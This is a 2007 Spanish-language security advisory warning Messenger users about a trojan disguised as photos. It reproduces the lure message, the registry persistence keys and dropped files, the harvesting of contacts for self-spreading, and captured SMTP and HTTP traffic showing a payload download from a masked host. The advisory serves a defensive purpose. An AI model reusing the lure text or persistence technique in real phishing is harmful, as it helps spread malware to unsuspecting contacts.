Comisión de Seguridad

ir a noticias
Logo de la Asociación de Internautas
Fecha artículo: 2007-06-08 11:52:02 - url artículo: http://seguridad.internautas.org/html/4245.html

Noticias

Falsas fotos

Nuevas modificaciones del virus-troyano Fotos Roberto.exe que llega por Messenger hace estragos.

Advertimos de nuevas variantes del este troyano que usa un llamativo asunto:

- Como estas?, tanto tiempo! -

El virus-troyano se auto-envía a los contactos que tenga el usuario en el Messenger.
Si usted recibe el siguiente correo electrónico o similares, tenga mucho cuidado;


From: "xxxxxxx@hotmail.com"
To:
Subject: Como estas?, tanto tiempo!

Y che como estas!! tanto tiempo!! el otro dia hable con Roberto..dice que ta todo bien..me paso unas fotos del y su mujer...me dijo que te pasara, descargalas de aca: http://XXXXXXX/fotos.zip ..tene cuidado a quien
le mostras he! responde o conectate al MSN algun dia q hace tanto tiempo q no nos juntamos todos los gurises!

Nessun dorma


Si se descarga o dependiendo el navegador que use se auto-descarga y se ejecuta sin el consentimiento del usuario, sepa que es un troyano.

El troyano que se ejecuta es; Fotos roberto.exe de 66,5 KB



Al ejecutarse nos modifica el registro y cambia opciones del navegador:

-Registro de Windows:\\HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
Cambiar svchost C:\WINDOWS\addins\svchost.exe
C:\WINDOWS\system\svchost.exe 08/06/2007 12:57:23

-C:\WINDOWS\system32\wbem\wmiprvse.exe
Registro de Windows:\\HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ Agregar Upgrade c:\windows\system32\winupgd.exe

-Internet Explorer:\\IESettings (MIMAQUINA) Cambiar Start Page http://prosXXXXXX.com about:blank


Crea un fichero llamado; mis contactos.txt
Este contiene los contactos de Messenger del usuario infectado, para ser usados en un reenvio.

Manda un correo electrónico y realiza una nueva descarga:




220 smtp-s1.antel.net.uy ESMTP Relay service (7.2.072.1) ready
EHLO MIMAQUINA
250-smtp-s1.antel.net.uy
250-8BITMIME
250-PIPELINING
250-HELP
250-AUTH=LOGIN
250-AUTH LOGIN CRAM-MD5 PLAIN
250-DELIVERBY 300
250 SIZE 30720000
AUTH LOGIN
334 VXNlcm5hbWU6
bWFyY2VkZWXXXXXXXXXXXXXXXXXXmV0LmNvbS51eQ==
334 UGXXXXXQ6


Descarga del nuevo fichero llamado: virus.zip

GET /virus.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: XXXXXX.com
Connection: Keep-Alive

HTTP/1.1 302 Found
Server: Apache/2.0.59 (Unix) PHP/5.2.0
Location: http://XXXXXXX.com/
Content-Length: 219
Connection: close
Content-Type: text/html; charset=iso-8859-1

En realidad este fichero es un ejecutable llamado; virus.exe




En el servidor que contiene el malware se encuentra otros ficheros:





Advertimos que los anti-virus no lo detectan al ser una nueva variante pues tenga mucho cuidado.

Consejos y advertencias:
Si usted recibe un correo de un extraño, un correo no deseado, incluso este tipo de tarjetas les recomendamos la máxima prudencia y si es posible no haga caso de este tipo de correos electrónico y NUNCA pulsar sobre los enlaces que contiene.


Agradecemos a KiKiTo (Pitas Pitas Pitas, por el aviso).


Comisión de Seguridad en la Red.
José María Luque Guerrero
http://seguridad.internautas.org - www.seguridadenlared.org - www.seguridadpymes.es
Asociación de Internautas. www.internautas.org
Logos y Marcas propiedad de sus respectivos autores
Se permite la reproducción total o parcial de todos los contenidos siempre que se cite la fuente y se enlace con el original
a excepciòn de los que indique lo contrario
© 1998-2011 Asociación de Internautas.